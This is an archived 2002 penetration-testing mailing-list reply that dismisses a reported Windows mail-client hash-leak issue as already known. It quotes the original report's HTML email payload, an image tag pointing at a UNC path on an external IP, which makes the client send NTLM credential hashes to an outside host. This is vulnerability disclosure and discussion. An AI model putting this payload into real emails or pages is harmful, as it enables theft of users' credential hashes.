Penetration Testing mailing list archives
Re: Hijacking the hashes : multiple windows mail clients vulnerability
From: "Fabio Pietrosanti (naif)" <naif () inet it>
Date: Fri, 5 Jul 2002 01:52:17 +0200
It's an old issue, as already explained in a paper of Joshua Wright . http://www.giac.org/practical/Joshua_Wright_GCIH.zip bye -naif On Wed, Jul 03, 2002 at 04:43:46PM -0000, overclocking_a_la_abuela () hotmail com wrote: [snip]
OK, that`s what we have found : simply send a html formatted mail message that includes this code : 1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img src="\\\\external_IP\\resource">.
[snip] -- Fabio Pietrosanti ( naif ) E-mail: naif () sikurezza org - naif () blackhats it PGP Key (DSS) http://naif.itapac.net/naif.asc -- "Hacking is the future of security research" R.Power, CSI Free advertising: www.openbsd.org Multiplatform Ultra-secure OS ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Hijacking the hashes : multiple windows mail clients vulnerability overclocking_a_la_abuela (Jul 03)
- Re: Hijacking the hashes : multiple windows mail clients vulnerability olle (Jul 04)
- Re: Hijacking the hashes : multiple windows mail clients vulnerability Fabio Pietrosanti (naif) (Jul 05)